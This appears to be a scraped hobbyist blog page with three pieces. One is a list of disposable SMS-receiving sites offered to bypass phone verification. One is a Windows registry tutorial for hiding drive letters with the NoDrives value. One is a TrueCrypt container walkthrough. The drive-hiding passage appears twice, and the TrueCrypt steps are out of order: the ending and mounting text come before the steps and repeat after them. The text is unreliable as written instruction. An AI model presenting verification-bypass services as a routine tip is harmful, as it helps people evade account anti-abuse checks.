here are the other online sms verification site to bypass sms or skip sms verification
receive-sms.com/
www.k7.net/
lleida.net/uk/
sms-verification.com/
receive-sms-online.com/
pinger.com/tfw
receivesmsonline.com/freephonenumber/
www.receivesmsonline.com/
www.youtextmessage.com/
www.simser.info
hide drive
Even though you can’t see the drive in Explorer, it can still easily be accessed via the command prompt or by manually typing in the path into the address bar in Explorer. Also, the drive will still show up in third-party programs and in tools like Computer Management, etc. That’s no real security, but if someone doesn’t know the drive even exists, it might be a quick way to keep it out of sight.
I tried this hack on Windows XP, Windows 7 and Windows 8 and it worked on all three. Ok, so here’s how to implement the hack: first off, back up your registry as this requires adding a key to the registry. Once you’ve backed up your registry, open the registry editor by clicking on Start, Run and typing in regedit.
Now navigate to the following registry hive shown below:
HKEY_LOCAL_MACHINE – Software – Microsoft – Windows – CurrentVersion – Policies – Explorer
Right-click on Explorer and choose New and then DWORD Value. In Windows 7 and Windows 8, you can choose DWORD (32-bit) Value.
Name the new value NoDrives and then double click on it to open the properties dialog box. Click on Decimal for the Base unit.
Type in one of the following values depending on the drive letter you want to hide.
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, All: 67108863
If you want to hide drive E, just type in the value 16. The really cool thing about this trick is the fact that you can hide multiple drives by adding the numbers of the particular drives together. For example, if you want to hide drive E and drive G, you would type in the number 80, which is 64 + 16.
Restart your computer and your drive will now be hidden! You can even hide the C drive, though I don’t see any point to doing that. Everything still works fine, in case you were curious.
When you want to get your drives back, change the value of NoDrives to 0 or simply delete the value altogether. If you need to hide and un-hide the drive quite often, it might be better to write a script to do it for you. As mentioned earlier, though, you can access the drive covertly while it’s hidden, so there is no real reason to un-hide it.
This trick also works for mapped drives, so if you want to hide mapped drives, you can do it this way (though it might just be easier to disconnect a mapped drive). If you have any questions, post a comment.
I tried this hack on Windows XP, Windows 7 and Windows 8 and it worked on all three. Ok, so here’s how to implement the hack: first off, back up your registry as this requires adding a key to the registry. Once you’ve backed up your registry, open the registry editor by clicking on Start, Run and typing in regedit.
Now navigate to the following registry hive shown below:
HKEY_LOCAL_MACHINE – Software – Microsoft – Windows – CurrentVersion – Policies – Explorer
Right-click on Explorer and choose New and then DWORD Value. In Windows 7 and Windows 8, you can choose DWORD (32-bit) Value.
Name the new value NoDrives and then double click on it to open the properties dialog box. Click on Decimal for the Base unit.
Type in one of the following values depending on the drive letter you want to hide.
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, All: 67108863
If you want to hide drive E, just type in the value 16. The really cool thing about this trick is the fact that you can hide multiple drives by adding the numbers of the particular drives together. For example, if you want to hide drive E and drive G, you would type in the number 80, which is 64 + 16.
Restart your computer and your drive will now be hidden! You can even hide the C drive, though I don’t see any point to doing that. Everything still works fine, in case you were curious.
When you want to get your drives back, change the value of NoDrives to 0 or simply delete the value altogether. If you need to hide and un-hide the drive quite often, it might be better to write a script to do it for you. As mentioned earlier, though, you can access the drive covertly while it’s hidden, so there is no real reason to un-hide it.
This trick also works for mapped drives, so if you want to hide mapped drives, you can do it this way (though it might just be easier to disconnect a mapped drive). If you have any questions, post a comment.
Hide a drive partition win xp/7/8.1
Here we can hide all drive letter with out any softwear.it is easy step for us .we can hide all drive by command prompt
Saturday, 7 February 2015
Encrypt file by true crypter
Hello and welcome to another InfoSecurity World tutorial. The intent of this article is to teach one how to encrypt sensitive files. When set up correctly with a strong password, it would be almost impossible to hack. Even the FBI have had issues decrypting this software. I'm here to teach you how to create a general encrypted container—not the complex hidden TrueCrypt volume.
What is the benefit to having a TrueCrypt container on the computer? There are many, and here are just some of them:
Guess what? That's it! That's all there is to creating a TC volume. Just click Exit to quit the program and I'll show you how to open the volume.
Find TC and open it up. Click "Select File" and find the container. Press OK, then click "Mount" and enter the password as the below picture shows.
What is the benefit to having a TrueCrypt container on the computer? There are many, and here are just some of them:
- Great place to store your passwords;
- Good for storing sensitive information such as your medical history and bank details;
- Great place to store sensitive back up files. Examples include government documentation such as your Social Security Number (SSN), Birth Certificate and/or Citizenship Certificate; and
- Having all your sensitive files in this encrypted container means that whenever your computer becomes infected, it cannot gather the information from what's in TrueCrypt. In addition to the above, should the computer get stolen, all your sensitive information will be encrypted and they won't be able to access it without the correct password.
Requirements
- Install the latest TrueCrypt from here before proceeding.
- Back up your computer in case something goes wrong.
- TrueCrypt works on Windows 7/Vista/XP/2000, Mac OS X and Linux. It supports both 32 and 64 bit on Windows and Linux.
Creating the Truecrypt Volume
Do NOT proceed to these steps until you have both installed TrueCrypt and backed up your operating system.Step 1 Create a Volume
Find Truecrypt on your computer and open it. Choose from the list of drive letters. I have chosen (F:) Drive to create my personal TC container. When you've chosen which drive to use, click "Create Volume".Step 2 Create an Encrypted File Container
You may also choose from the others, but we will not be discussing those options today. It is also recommended that inexperienced users go with the method I'm creating. It doesn't make the data any less secure choosing this option. The other options are more about encrypting the entire computer which is for advanced users, not beginners.Step 3 Create a Standard TrueCrypt Volume
Do not select "Hidden TrueCrypt Volume", as this is for more advanced users.Step 4 Choose the Destination
Navigate to the "Documents" folder and for the file name, type something like 'TC Volume". Do NOT click on an existing file or folder and press save. Doing so will overwrite it—all data within it will be lost.Step 5 Select Your Encryption Method
The default is recommended. AES-256 has being trusted for many years and therefore is more reliable. Note that this encryption method might be used by the U.S. government to protect classified information up to the Top Secret level.Step 6 Choose the Container's Size
Think about what you will be storing and how much? It's a good idea to add a little bit of extra space in case you decide to store something big. 5 to 10 GB is usually enough.Step 7 Choose a Password
I recommend at least a 20-character password. It should contain letters (lower and upper case), numbers, symbols and spaces. Here is a great guide to creating good passwords.Step 8 Set the Default File System
Here you need to make a decision on whether the container will be used to store large files (over 4GB). Depending on what you choose, it will let TC choose the best formatting option for you.Step 9 Create Your Encryption Key
Step nine is the fun part! Move your mouse randomly across the TC window to create your encryption key. The longer you move it the stronger the encryption will be. 30 seconds should be the absolute minimum, while a minute or two is ideal. What will happen after you've done this is TC will format your volume, which shouldn't take too long.Guess what? That's it! That's all there is to creating a TC volume. Just click Exit to quit the program and I'll show you how to open the volume.
Find TC and open it up. Click "Select File" and find the container. Press OK, then click "Mount" and enter the password as the below picture shows.
Warning
- The use of encryption is illegal in some countries. So before you install this, ensure that this program is legal in your country.
Subscribe to:
Posts (Atom)